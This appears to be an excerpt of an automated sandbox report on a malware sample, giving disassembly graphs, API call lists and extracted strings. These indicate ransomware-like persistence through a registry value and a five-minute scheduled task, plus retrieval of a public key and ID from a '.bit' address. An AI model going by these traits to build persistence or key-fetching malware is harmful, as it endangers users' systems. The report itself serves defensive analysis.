                                                                                                  • Opcode ID: d3b60f996c466e858e50e3dbe27eca37aeb68dcd0f96e8225aa0df28d297952d
                                                                                                  • Instruction ID: 5eef3a0702531f6153c0a61ec6f267db6b79776719a51e14698406b924935571
                                                                                                  • Opcode Fuzzy Hash: d3b60f996c466e858e50e3dbe27eca37aeb68dcd0f96e8225aa0df28d297952d
                                                                                                  • Instruction Fuzzy Hash: 0D3251B1E0022D9ADF609F64CD45BAEBA79FF45704F0041EAA60CE7251EB748E84CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 776 48e690-48e6d8 call 49f7c0 timeGetTime call 493f74 call 47c6a0 783 48e6e0-48e6e6 776->783 784 48e6f0-48e722 call 49b420 call 47c500 783->784 789 48e72e-48e772 InternetOpenW 784->789 790 48e724-48e729 784->790 791 48e778-48e77d 789->791 792 48e774-48e776 789->792 793 48ea1f-48ea40 call 493cf0 790->793 796 48e780-48e789 791->796 795 48e78f-48e7b8 call 485ae0 call 491c02 792->795 800 48ea8d-48eacc lstrlenA lstrcpyA * 2 lstrlenA 793->800 801 48ea42-48ea46 793->801 814 48e7be-48e7f7 call 484690 call 47dd40 795->814 815 48e882-48e8e5 call 485ae0 call 483ff0 call 482900 call 4859d0 795->815 796->796 798 48e78b-48e78d 796->798 798->795 805 48eace 800->805 806 48eaef-48eb12 800->806 803 48ee2a call 481b10 801->803 804 48ea4c-48ea61 SHGetFolderPathA 801->804 816 48ee2f-48ee3a 803->816 804->784 811 48ea67-48ea88 PathAppendA DeleteFileA 804->811 812 48ead0-48ead8 805->812 809 48eb18-48eb1f 806->809 810 48eb14-48eb16 806->810 818 48eb22-48eb27 809->818 817 48eb2b-48eb4f call 4856d0 call 482900 810->817 811->784 819 48eada-48eae7 lstrlenA 812->819 820 48eaeb 812->820 840 48e7f9-48e7fe 814->840 841 48e86f-48e874 814->841 875 48e8f3-48e917 lstrcpyW 815->875 876 48e8e7-48e8f0 call 492587 815->876 822 48ee3c-48ee3f 816->822 823 48ee4d-48ee82 call 47ef50 816->823 845 48eb51 817->845 846 48eb53-48eb66 lstrcpyW 817->846 818->818 825 48eb29 818->825 819->812 827 48eae9 819->827 820->806 822->783 837 48ee86-48ee8c 823->837 825->817 827->806 842 48ee8e-48ee90 837->842 843 48ee92-48ee94 837->843 848 48e80c-48e827 840->848 849 48e800-48e809 call 492587 840->849 841->815 847 48e876-48e87f call 492587 841->847 850 48eea0-48eeaf call 483ea0 842->850 852 48ee97-48ee9c 843->852 845->846 853 48eb68-48eb71 call 492587 846->853 854 48eb74-48ebe4 lstrlenA call 490c62 call 49b420 MultiByteToWideChar lstrcpyW call 493cf0 846->854 847->815 858 48e829-48e82d 848->858 859 48e842-48e848 848->859 849->848 850->837 872 48eeb1-48eee3 call 47ef50 850->872 852->852 861 48ee9e 852->861 853->854 900 48ec3d-48ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 854->900 901 48ebe6-48ebea 854->901 867 48e84e-48e86c 858->867 868 48e82f-48e840 call 4905a0 858->868 859->867 861->850 867->841 868->867 891 48eee7-48eeed 872->891 878 48e919-48e920 875->878 879 48e943-48e97a InternetOpenUrlW InternetReadFile 875->879 876->875 878->879 884 48e922-48e92e 878->884 886 48e9ec-48ea08 InternetCloseHandle * 2 879->886 887 48e97c-48e994 SHGetFolderPathA 879->887 892 48e930-48e935 884->892 893 48e937 884->893 889 48ea0a-48ea13 call 492587 886->889 890 48ea16-48ea19 886->890 887->886 895 48e996-48e9c2 PathAppendA call 4920b6 887->895 889->890 890->793 897 48eeef-48eef1 891->897 898 48eef3-48eef5 891->898 899 48e93c-48e93d lstrcatW 892->899 893->899 895->886 915 48e9c4-48e9e4 lstrlenA call 492b02 call 493a38 895->915 904 48ef01-48ef10 call 483ea0 897->904 905 48eef8-48eefd 898->905 899->879 908 48ec99 900->908 909 48ecbf-48ecdd 900->909 901->803 906 48ebf0-48ec11 SHGetFolderPathA 901->906 904->891 925 48ef12-48ef4c call 483ff0 call 482900 904->925 905->905 912 48eeff 905->912 906->784 914 48ec17-48ec38 PathAppendA DeleteFileA 906->914 916 48eca0-48eca8 908->916 910 48ecdf-48ece1 909->910 911 48ece3-48eced 909->911 917 48ecf9-48ed1b call 4856d0 call 482900 910->917 918 48ecf0-48ecf5 911->918 912->904 914->783 933 48e9e9 915->933 921 48ecaa-48ecb7 lstrlenA 916->921 922 48ecbb 916->922 936 48ed1d 917->936 937 48ed1f-48ed35 lstrcpyW 917->937 918->918 923 48ecf7 918->923 921->916 927 48ecb9 921->927 922->909 923->917 939 48ef4e 925->939 940 48ef50-48ef68 lstrcpyW 925->940 927->909 933->886 936->937 941 48ed43-48edab lstrlenA call 490c62 call 49b420 MultiByteToWideChar lstrcpyW lstrlenW 937->941 942 48ed37-48ed40 call 492587 937->942 939->940 944 48ef6a-48ef73 call 492587 940->944 945 48ef76-48efb3 call 483ff0 call 482900 940->945 956 48edbc-48edc1 941->956 957 48edad-48edb6 lstrlenW 941->957 942->941 944->945 962 48efb5 945->962 963 48efb7-48efc6 lstrcpyW 945->963 960 48ee10-48ee12 956->960 961 48edc3-48ede4 SHGetFolderPathA 956->961 957->956 959 48ee44-48ee48 957->959 964 48f01a-48f030 959->964 966 48ee1d-48ee1f 960->966 967 48ee14-48ee1a call 490bed 960->967 961->784 965 48edea-48ee0b PathAppendA DeleteFileA 961->965 962->963 968 48efc8-48efd1 call 492587 963->968 969 48efd4-48efe0 963->969 965->783 966->803 973 48ee21-48ee27 call 490bed 966->973 967->966 968->969 970 48efee-48f008 969->970 971 48efe2-48efeb call 492587 969->971 976 48f00a-48f013 call 492587 970->976 977 48f016 970->977 971->970 973->803 976->977 977->964
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(?,?,?,?,?,0053B3EC,000000FF), ref: 0048E6C0
                                                                                                    • Part of subcall function 0047C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0048E6D4), ref: 0047C6C2
                                                                                                    • Part of subcall function 0047C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0047C6F3
                                                                                                    • Part of subcall function 0047C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0047C700
                                                                                                  • _memset.LIBCMT ref: 0048E707
                                                                                                    • Part of subcall function 0047C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0047C51B
                                                                                                  • InternetOpenW.WININET ref: 0048E743
                                                                                                  • _wcsstr.LIBCMT ref: 0048E7AE
                                                                                                  • _memmove.LIBCMT ref: 0048E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0048E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0048E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0048E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0048E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0048E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F6
                                                                                                  • _strstr.LIBCMT ref: 0048EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0048EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0048EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EB7C
                                                                                                  • _malloc.LIBCMT ref: 0048EB86
                                                                                                  • _memset.LIBCMT ref: 0048EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0048EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EBB6
                                                                                                  • _strstr.LIBCMT ref: 0048EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EC32
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0048EC3E
                                                                                                  • lstrlenA.KERNEL32(","id":"), ref: 0048EC51
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EC6D
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EC7F
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EC93
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0048ECB3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048ED2A
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048ED4B
                                                                                                  • _malloc.LIBCMT ref: 0048ED55
                                                                                                  • _memset.LIBCMT ref: 0048ED63
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0048ED7D
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048ED85
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0048EDA3
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0048EDAE
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EDD3
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EDF7
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EE05
                                                                                                  • _free.LIBCMT ref: 0048EE15
                                                                                                  • _free.LIBCMT ref: 0048EE22
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EF61
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EFBF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                  • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 704684250-3586605218
                                                                                                  • Opcode ID: e9b27e214c88838a08e62b0e1e6f6a58ca42ed47ca3eccd8acccb6a23e828bd7
                                                                                                  • Instruction ID: 0d8c3bd5e19994704a6460f4dcd9889fbeb7706e0082bf87bae6851b8080a411
                                                                                                  • Opcode Fuzzy Hash: e9b27e214c88838a08e62b0e1e6f6a58ca42ed47ca3eccd8acccb6a23e828bd7
                                                                                                  • Instruction Fuzzy Hash: 9F42D371508341ABDB20EF25CC49B9F7BE8BF55308F000D2EF58597292DB79A509CB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1213 47d240-47d274 CoInitialize 1214 47d276-47d278 1213->1214 1215 47d27d-47d2dd CoInitializeSecurity call 484690 CoCreateInstance 1213->1215 1216 47da8e-47da92 1214->1216 1222 47d2e3-47d3ca VariantInit * 4 VariantClear * 4 1215->1222 1223 47da3c-47da44 CoUninitialize 1215->1223 1218 47da94-47da9c call 492587 1216->1218 1219 47da9f-47dab1 1216->1219 1218->1219 1229 47d3e2-47d3fe call 47b140 1222->1229 1230 47d3cc-47d3dd CoUninitialize 1222->1230 1225 47da69-47da6d 1223->1225 1226 47da6f-47da77 call 492587 1225->1226 1227 47da7a-47da8a 1225->1227 1226->1227 1227->1216 1236 47d404 1229->1236 1237 47d400-47d402 1229->1237 1230->1225 1238 47d406-47d424 call 47b1d0 1236->1238 1237->1238 1242 47d426-47d437 CoUninitialize 1238->1242 1243 47d43c-47d451 call 47b140 1238->1243 1242->1225 1247 47d457 1243->1247 1248 47d453-47d455 1243->1248 1249 47d459-47d494 call 47b1d0 1247->1249 1248->1249 1255 47d496-47d4a7 CoUninitialize 1249->1255 1256 47d4ac-47d4c2 1249->1256 1255->1225 1259 47da2a-47da37 1256->1259 1260 47d4c8-47d4dd call 47b140 1256->1260 1259->1223 1264 47d4e3 1260->1264 1265 47d4df-47d4e1 1260->1265 1266 47d4e5-47d508 call 47b1d0 1264->1266 1265->1266 1266->1259 1271 47d50e-47d524 1266->1271 1271->1259 1273 47d52a-47d542 1271->1273 1273->1259 1276 47d548-47d55e 1273->1276 1276->1259 1278 47d564-47d57c 1276->1278 1278->1259 1281 47d582-47d59b 1278->1281 1281->1259 1283 47d5a1-47d5b6 call 47b140 1281->1283 1286 47d5bc 1283->1286 1287 47d5b8-47d5ba 1283->1287 1288 47d5be-47d5e1 call 47b1d0 1286->1288 1287->1288 1288->1259 1293 47d5e7-47d5fd 1288->1293 1293->1259 1295 47d603-47d626 1293->1295 1295->1259 1298 47d62c-47d651 1295->1298 1298->1259 1301 47d657-47d666 1298->1301 1301->1259 1303 47d66c-47d681 call 47b140 1301->1303 1306 47d687 1303->1306 1307 47d683-47d685 1303->1307 1308 47d689-47d6a3 call 47b1d0 1306->1308 1307->1308 1308->1259 1312 47d6a9-47d6be call 47b140 1308->1312 1315 47d6c4 1312->1315 1316 47d6c0-47d6c2 1312->1316 1317 47d6c6-47d6e0 call 47b1d0 1315->1317 1316->1317 1317->1259 1321 47d6e6-47d6f4 1317->1321 1321->1259 1323 47d6fa-47d70f call 47b140 1321->1323 1326 47d715 1323->1326 1327 47d711-47d713 1323->1327 1328 47d717-47d731 call 47b1d0 1326->1328 1327->1328 1328->1259 1332 47d737-47d74c call 47b140 1328->1332 1335 47d752 1332->1335 1336 47d74e-47d750 1332->1336 1337 47d754-47d76e call 47b1d0 1335->1337 1336->1337 1337->1259 1341 47d774-47d7ce call 493aaf call 493551 call 4928e0 call 482c40 call 482900 1337->1341 1352 47d7d2-47d7e3 call 47b140 1341->1352 1353 47d7d0 1341->1353 1356 47d7e5-47d7e7 1352->1356 1357 47d7e9 1352->1357 1353->1352 1358 47d7eb-47d819 call 47b1d0 call 483210 1356->1358 1357->1358 1358->1259 1365 47d81f-47d835 1358->1365 1365->1259 1367 47d83b-47d85e 1365->1367 1367->1259 1370 47d864-47d889 1367->1370 1370->1259 1373 47d88f-47d8ab call 47b140 1370->1373 1376 47d8b1 1373->1376 1377 47d8ad-47d8af 1373->1377 1378 47d8b3-47d8cd call 47b1d0 1376->1378 1377->1378 1382 47d8cf-47d8d8 1378->1382 1383 47d8dd-47d8f2 call 47b140 1378->1383 1382->1259 1387 47d8f4-47d8f6 1383->1387 1388 47d8f8 1383->1388 1389 47d8fa-47d91d call 47b1d0 1387->1389 1388->1389 1389->1259 1394 47d923-47d98d call 47b400 VariantInit * 2 call 47b140 1389->1394 1399 47d993 1394->1399 1400 47d98f-47d991 1394->1400 1401 47d995-47da0e call 47b1d0 VariantClear * 3 1399->1401 1400->1401 1405 47da46-47da67 CoUninitialize 1401->1405 1406 47da10-47da27 call 49052a 1401->1406 1405->1225 1406->1259
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0047D26C
                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0047D28F
                                                                                                  • CoCreateInstance.OLE32(0054506C,00000000,00000001,00544FEC,?,?,00000000,000000FF), ref: 0047D2D5
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D2F0
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D309
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D322
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D33B
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D397
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D3A4
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D3B1
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D3C2
                                                                                                  • CoUninitialize.OLE32 ref: 0047D3D5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                  • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                  • API String ID: 2496729271-1738591096
                                                                                                  • Opcode ID: 30a6bcf271d97cb55fd0fe027a77cb7ae9cf3a633630f7a879f12f454841fa66
                                                                                                  • Instruction ID: fc31322816b200f66bb34dc897b2630b55f443b5e6af9b04521bc33d8b381c41
                                                                                                  • Opcode Fuzzy Hash: 30a6bcf271d97cb55fd0fe027a77cb7ae9cf3a633630f7a879f12f454841fa66
                                                                                                  • Instruction Fuzzy Hash: EF526C70E00219DFDB10DFA5C848BEEBBB4FF49314F148199E509AB251DB34AE46CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00481010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00481026
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,004BF299,?,?,?,?,?,?,?,004BF299,?,00578238,?), ref: 004A0F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0048103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00481051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00481059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00481064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0048107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00481099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004810AB
                                                                                                  • _memset.LIBCMT ref: 004810CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004810DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004810F0
                                                                                                  • _malloc.LIBCMT ref: 00481100
                                                                                                  • _memset.LIBCMT ref: 0048110B
                                                                                                  • _sprintf.LIBCMT ref: 0048112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0048113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00481154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0048115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  • Opcode ID: 88674e36191a2cadfdff73dc56993c1bfdc4e4f411ae50bbb2f20f344d6124e8
                                                                                                  • Instruction ID: d41f32797efb5935eba595f10b286636d336b0f6bdedaf8aa163d4008a927693
                                                                                                  • Opcode Fuzzy Hash: 88674e36191a2cadfdff73dc56993c1bfdc4e4f411ae50bbb2f20f344d6124e8
                                                                                                  • Instruction Fuzzy Hash: AE519071D40209ABDF10EBA0DC4AFEFBFB8FB15704F10002AF905B6290D77959059BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00481AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481ACA
                                                                                                    • Part of subcall function 00481AB0: DispatchMessageW.USER32(?), ref: 00481AE0
                                                                                                    • Part of subcall function 00481AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0047F900
                                                                                                  • _memmove.LIBCMT ref: 0047F9EA
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0047FA51
                                                                                                  • _memmove.LIBCMT ref: 0047FADA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  • Opcode ID: 5060a9e45209437b81e3850fbf9d940e9d2574a008ad6daec5c36b24554f7892
                                                                                                  • Instruction ID: 89c35870a8934aa77e8bff596743ee0181b7c7f53b052b0187e2ece4051ae687
                                                                                                  • Opcode Fuzzy Hash: 5060a9e45209437b81e3850fbf9d940e9d2574a008ad6daec5c36b24554f7892
                                                                                                  • Instruction Fuzzy Hash: 0952C271D00208DFDF10DFA8C985BDEBBF4BF05308F10856AE419A7251E779AA49CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1885 47e870-47e8d6 call 4856d0 CryptAcquireContextW 1888 47e8e9-47e901 CryptCreateHash 1885->1888 1889 47e8d8-47e8e4 call 4a0eca 1885->1889 1891 47e914-47e930 CryptHashData 1888->1891 1892 47e903-47e90f call 4a0eca 1888->1892 1889->1888 1893 47e943-47e961 CryptGetHashParam 1891->1893 1894 47e932-47e93e call 4a0eca 1891->1894 1892->1891 1897 47e974-47e9a6 call 490be4 call 49b420 CryptGetHashParam 1893->1897 1898 47e963-47e96f call 4a0eca 1893->1898 1894->1893 1904 47e9b9-47e9bb 1897->1904 1905 47e9a8-47e9b4 call 4a0eca 1897->1905 1898->1897 1907 47e9c0-47e9c3 1904->1907 1905->1904 1908 47e9c5-47e9df call 4904a6 1907->1908 1909 47ea10-47ea31 call 492110 CryptDestroyHash CryptReleaseContext 1907->1909 1914 47e9f2-47e9f5 1908->1914 1915 47e9e1-47e9f0 call 483ea0 1908->1915 1916 47ea33-47ea3b call 492587 1909->1916 1917 47ea3e-47ea50 1909->1917 1919 47e9f8-47e9fd 1914->1919 1915->1907 1916->1917 1919->1919 1922 47e9ff-47ea0e call 483ea0 1919->1922 1922->1907
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0056FCA4,00000000,00000000), ref: 0047E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E8E4
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,004BF299,?,?,?,?,?,?,?,004BF299,?,00578238,?), ref: 004A0F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0047E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0047E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E96F
                                                                                                  • _memset.LIBCMT ref: 0047E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0047E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E9B4
                                                                                                  • _sprintf.LIBCMT ref: 0047E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
